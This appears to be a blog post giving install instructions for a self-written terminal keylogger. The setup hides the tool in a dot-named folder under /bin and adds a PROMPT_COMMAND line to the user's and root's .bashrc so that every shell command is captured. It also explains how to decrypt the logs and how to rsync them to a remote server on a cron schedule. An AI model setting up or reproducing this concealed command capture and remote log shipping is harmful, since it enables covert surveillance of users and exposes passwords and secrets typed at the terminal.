I recently updated the terminal keylogger program by adding a few features and also made the setup and installation smoother.
New Features
The script now performs some other functionalities by creating and setting other script files for ease of use.
Now when the script is executed for the first time it creates a few files which include;
.clean-keylogs.sh.log_history.shlog_file.logkey-log-history
These four new files will now be created when the script executes for the first time. Which will now be added to the .md.enc file(s) the script already creates.
Purpose Of New Files
The .clean-keylog.sh file
This file acts as a basic template to create a backup solution using rsync all the logs it has captured for the month. The script can be modified however you want.
Learn more about rsync here: https://linux.die.net/man/1/rsync
If you want to keep my template Then I suggest you change it backup_dir to somewhere remote since we will be utilizing the features of rsync.
To something like this below;
"username@0.0.0.0:/destination/keylog_backups/${monthofbackup}"Always remember to give permissions so that rsync can create the directory if it does not exist on the server you want to send the backups to.
You can also add any options you want to include with rsync.
You must note that any modifications you make to this file would not be saved if the file itself were to be deleted or moved. The Python script creates the file and then adds my template to it without your modifications. You can fix this by simply making a backup of all your changes or you could go the complicated route by modifying the Python script.
The .log_history.sh & key-log-history files
These two files work hand-in-hand. For starters, the .log_history.sh file first checks if the key-log-history file exists in the home directory, if not then it creates it. Then it looks for the last line of command the .bash_history file in the home directory as well as the root directory.
It then copies the command to memory then adds time and date to the end of the command which is then ultimately appended to the key-log-history file.
Then main .terminal-keylogger.py script reads the command from the key-log-history and then appends it to an encrypted file.
You might be wondering, "How then is the script capturing the newly entered commands from the terminal. since those commands won't be added to the .bash_history file until the system has been shut down or restarted".
To answer your question, the script when executed for the first time appends a line of code to the .bashrc file in both the home directory and the root directory. This line is what forces the newly entered commands in the terminal window to be appended immediately to the .bash_history file, particularly the history -a command. That way we wouldn’t have to wait to restart the system before we capture newly entered commands.
The log_file.log file
As you might assume, this file keeps all error logs that are related to the program most typically one error related to the history command.
To get started with the script you can follow the installation instructions below. Any feedback you’ve got can be sent straight to my mail at the navigation menu at the top.
Installation & Setup
1. Update your repos
sudo apt update && sudo apt upgrade -y
2. Install
git
For the latest stable version for your release of Debian/Ubuntu
apt-get install git
For Ubuntu, this PPA provides the latest stable upstream Git version
add-apt-repository ppa:git-core/ppa # apt update; apt install git
3. Clone this repository
Download or clone the repo with git. Then change owership of the directory to the user.
git clone https://github.com/Joshua-ansah/Terminal-Keylogger.git
sudo mv Terminal-Keylogger/.terminal-keylogger /bin/
cd /bin
sudo chown <USERNAME HERE> .terminal-keylogger
cd /bin/.terminal-keylogger/
4. Provide
execute permissions to the script.
The python script will need execute permissions to work.
sudo chmod +x .terminal-keylogger.py
5. Set your
password
Open the .terminal-keylogger.py file with your prefered editor. Scroll to the bottom and change the "your_password" to the password you want to set for the ecryption.
6. Start the program
You only need to excute the script once and it will automatically start anytime you reboot your system.
python3 .terminal-keylogger.py
press enter when you greeted with an error like this
roobak@ubuntu002:/bin/.terminal-keylogger$ python3 .terminal-keylogger.py
source ~/.bashrc
Traceback (most recent call last):
File "/usr/bin/.terminal-keylogger/.terminal-keylogger.py", line 151, in <module>
modify_bash_history(input_file, output_file)
File "/usr/bin/.terminal-keylogger/.terminal-keylogger.py", line 103, in modify_bash_history
with open(input_file, 'r') as f:
^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/home/roobak/.key-log-history'
Now you can source the .bashrcfile.
source ~/.bashrc
For the root user
sudo su
source ~/.bashrc
exit
THINGS TO NOTE
1. You may have to close the terminal window for the changes to take effect.
2. If root logging does not work. manually add this line to the last line of the /root/.bashrc file
export PROMPT_COMMAND='history -a; bash /bin/.terminal-keylogger/.log_history.sh; python3 /bin/.terminal-keylogger/.terminal-keylogger.py;$PROMPT_COMMAND >> /bin/.terminal-keylogger/log_file.log 2>&1;'
6. You are all done!
To confirm functionality, the script will create these files in the /bin/.terminal-keylogger/.
1. .clean-keylogs.sh
2. .log_history.sh
3. termkeys-<YOUR-USERNAME>on<YOUR-HOSTNAME>-<DATE>.md.enc
4. log_file.log
5. termkeys-rooton<YOUR-HOSTNAME>-<DATE>.md.enc
then in both the $HOME of the user and root, this file will be created
1. key-log-history
Decryption of the file
When the script is executed, a .enc file will be placed in the .terminal-keylogger directory.
To decrypt the file use this and also replace THE-NAME-OF-YOUR-ENC-FILE with the actual filename as well as YOUR_PASSWORD;
openssl aes-256-cbc -d -a -salt -pbkdf2 -in THE-NAME-OF-YOUR-ENC-FILE -out output_file.tar.gz -k YOUR_PASSWORD
Log-Rotation
To implement log-rotation and backing up of your log files, modify the rsync command in the .clean-keylogs.sh to send the files to a remote destination.
You can then schedule the excution of the script via a cronjob